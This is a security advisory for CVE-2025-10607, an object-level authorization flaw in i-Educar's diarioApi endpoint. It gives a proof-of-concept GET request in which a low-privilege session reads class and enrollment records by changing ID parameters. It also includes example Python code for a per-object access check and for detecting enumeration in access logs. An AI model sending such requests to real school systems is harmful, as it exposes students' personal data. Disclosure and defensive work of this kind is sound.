
CVE-2025-10607

Broken Access Control (BOLA)

CVE-2025-10607: Broken Object Level Authorization (BOLA) allows enumeration of classes data via /module/Avaliacao/diarioApi

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-10607

Summary

A Broken Object Level Authorization (BOLA) vulnerability was identified in the /module/Avaliacao/diarioApi endpoint of the i-Educar application. This flaw allows a user without proper permissions to query the endpoint and retrieve class information by manipulating request parameters.

Although this vulnerability does not directly expose individual student data, it still constitutes an unauthorized disclosure of academic structure information, which can be leveraged for enumeration or as a stepping stone for further attacks.

Details

Vulnerable Endpoint: GET /module/Avaliacao/diarioApi

The application fails to enforce object-level authorization when handling this endpoint. As a result, any authenticated user can manipulate the request values to access sensitive information (names, IDs, enrollment status) of students.

Expected behavior:

  • Only authorized roles (e.g., administrators, coordinators, teachers linked to the class) should be able to access this data.
  • Unauthorized users should receive 403 Forbidden or an empty response.

Observed behavior:

  • Any authenticated user (even low-privilege accounts) can access this endpoint and retrieve sensitive information about academic classes.
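The expected behavior above comes down to one decision the endpoint currently skips: checking the caller's relationship to the specific turma/matricula named in the request, not just whether the caller is logged in. The following is an added example, not i-Educar code: the roles, the teacher-to-class links and the enrollment table are constructed stand-ins, and the handler only mimics the request/response shape of diarioApi so the per-object check is visible on its own.

```python
from dataclasses import dataclass

# Roles allowed to read any class/enrollment record (assumption for this example).
ROLES_WITH_GLOBAL_READ = frozenset({"admin", "coordinator"})


@dataclass(frozen=True)
class User:
    user_id: int
    role: str                                   # "admin", "coordinator", "teacher", "student"
    teaches: frozenset = frozenset()            # turma_id values this teacher is linked to
    own_enrollments: frozenset = frozenset()    # matricula_id values belonging to this student


# Constructed stand-in for the enrollment (matricula) table: matricula_id -> record.
ENROLLMENTS = {
    12: {"matricula_id": 12, "turma_id": 3, "aluno": "Student A", "situacao": "cursando"},
    13: {"matricula_id": 13, "turma_id": 3, "aluno": "Student B", "situacao": "cursando"},
    20: {"matricula_id": 20, "turma_id": 7, "aluno": "Student C", "situacao": "transferido"},
}


def can_read_enrollment(user: User, matricula_id: int) -> bool:
    """Object-level decision: is *this* user allowed to read *this* matricula?"""
    record = ENROLLMENTS.get(matricula_id)
    if record is None:
        return False          # unknown object: deny, indistinguishable from unauthorized
    if user.role in ROLES_WITH_GLOBAL_READ:
        return True
    if user.role == "teacher" and record["turma_id"] in user.teaches:
        return True           # teacher linked to the class the enrollment belongs to
    if user.role == "student" and matricula_id in user.own_enrollments:
        return True           # a student may see only their own enrollment
    return False


def handle_diario_request(user: User, params: dict) -> tuple:
    """Mimics the endpoint: returns (http_status, body) for a resource=matriculas read."""
    raw = params.get("matricula_id", "")
    if not raw.isdigit():     # e.g. "undefined", as seen for serie_id in the PoC query string
        return 400, {"error": "invalid matricula_id"}
    matricula_id = int(raw)
    if not can_read_enrollment(user, matricula_id):
        return 403, {"error": "forbidden"}      # uniform response, no record details leaked
    return 200, dict(ENROLLMENTS[matricula_id])


if __name__ == "__main__":
    teacher = User(2, "teacher", teaches=frozenset({3}))
    print(handle_diario_request(teacher, {"matricula_id": "13"}))   # (200, {...})
    print(handle_diario_request(teacher, {"matricula_id": "20"}))   # (403, {'error': 'forbidden'})
```

The check is made against the record's own turma_id rather than the turma_id supplied in the query string, so a caller cannot pair a matricula they are not linked to with a class they are. Unknown and unauthorized objects both return 403 with the same body, which keeps the response from doubling as an existence oracle.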

PoC

  • Authenticate as a non-privileged user (e.g., student, professor).

  • Send the following request:

GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&instituicao_id=1&escola_id=3&curso_id=4&serie_id=undefined&turma_id=3&ano_escolar=2025&componente_curricular_id=11&etapa=1&matricula_id=12&busca=S&mostrar_botao_replicar_todos=1&ano=2025&ref_cod_instituicao=1&ref_cod_escola=3&ref_cod_curso=4&ref_cod_serie=6&ref_cod_turma=3&etapa=1&ref_cod_componente_curricular=11&ref_cod_matricula=12&navegacao_tab=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://localhost/module/Avaliacao/diario?&resource=matriculas&oper=get&instituicao_id=1&escola_id=3&curso_id=4&serie_id=undefined&turma_id=3&ano_escolar=2025&componente_curricular_id=11&etapa=1&matricula_id=12
Cookie: educar_session=[low-privileged-session]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

  • We observed that information about classes was returned.

Impact

This vulnerability is a Broken Object Level Authorization (BOLA) issue (OWASP API Top 10 - 2023, A01), allowing sensitive data exposure. Any authenticated user can access personal information of other users. This can lead to:

  • Unauthorized access to sensitive PII;
  • Violation of data protection laws (e.g., LGPD, GDPR);
  • Potential abuse of user data or impersonation;
  • User enumeration.
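Until the authorization check is in place, the enumeration listed above is something a web-server log can show: one client's successful diarioApi reads spread across many distinct matricula_id/turma_id values. This is an added example, not part of the advisory: the log lines are constructed in common log format to mirror the PoC request, the threshold is an assumption to tune per deployment, and clients are keyed by source IP because the session cookie is not in the access log.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Common log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)
TARGET_PATH = "/module/Avaliacao/diarioApi"
OBJECT_PARAMS = ("matricula_id", "turma_id")   # the identifiers that select the object

# Constructed sample log: 10.0.0.5 walks through matricula_id values,
# 10.0.0.9 repeats a single lookup and then loads the normal diario page.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Oct/2025:10:00:01 +0000] "GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&turma_id=3&matricula_id=12 HTTP/1.1" 200 611
10.0.0.5 - - [03/Oct/2025:10:00:02 +0000] "GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&turma_id=3&matricula_id=13 HTTP/1.1" 200 598
10.0.0.5 - - [03/Oct/2025:10:00:02 +0000] "GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&turma_id=3&matricula_id=14 HTTP/1.1" 200 603
10.0.0.5 - - [03/Oct/2025:10:00:03 +0000] "GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&turma_id=3&matricula_id=15 HTTP/1.1" 200 590
10.0.0.5 - - [03/Oct/2025:10:00:03 +0000] "GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&turma_id=4&matricula_id=16 HTTP/1.1" 200 612
10.0.0.5 - - [03/Oct/2025:10:00:04 +0000] "GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&turma_id=4&matricula_id=17 HTTP/1.1" 200 607
10.0.0.9 - - [03/Oct/2025:10:00:05 +0000] "GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&turma_id=3&matricula_id=12 HTTP/1.1" 200 611
10.0.0.9 - - [03/Oct/2025:10:00:06 +0000] "GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&turma_id=3&matricula_id=12 HTTP/1.1" 200 611
10.0.0.9 - - [03/Oct/2025:10:00:07 +0000] "GET /module/Avaliacao/diario HTTP/1.1" 200 4021
""".splitlines()


def parse_diario_request(line):
    """Return {ip, status, object} for a diarioApi request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    if parts.path != TARGET_PATH:
        return None
    query = parse_qs(parts.query)          # the leading "?&" in the PoC URL is harmless here
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "object": tuple(query.get(p, [None])[0] for p in OBJECT_PARAMS),
    }


def find_enumeration(lines, threshold=5):
    """Map ip -> number of distinct (matricula_id, turma_id) pairs read successfully,
    keeping only clients at or above `threshold`."""
    objects_by_ip = defaultdict(set)
    for line in lines:
        rec = parse_diario_request(line)
        if rec is None or rec["status"] != 200:
            continue                        # only successful reads disclose data
        objects_by_ip[rec["ip"]].add(rec["object"])
    return {ip: len(objs) for ip, objs in objects_by_ip.items() if len(objs) >= threshold}


if __name__ == "__main__":
    for ip, n in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {n} distinct enrollment objects read via diarioApi")
```

Counting distinct objects rather than raw request volume is what separates enumeration from a teacher refreshing one class page; the repeated lookup from 10.0.0.9 stays below the threshold while the sequential walk from 10.0.0.5 does not.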

Reference

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10607.md

Finder

Marcelo Queiroz

By: CVE-Hunters
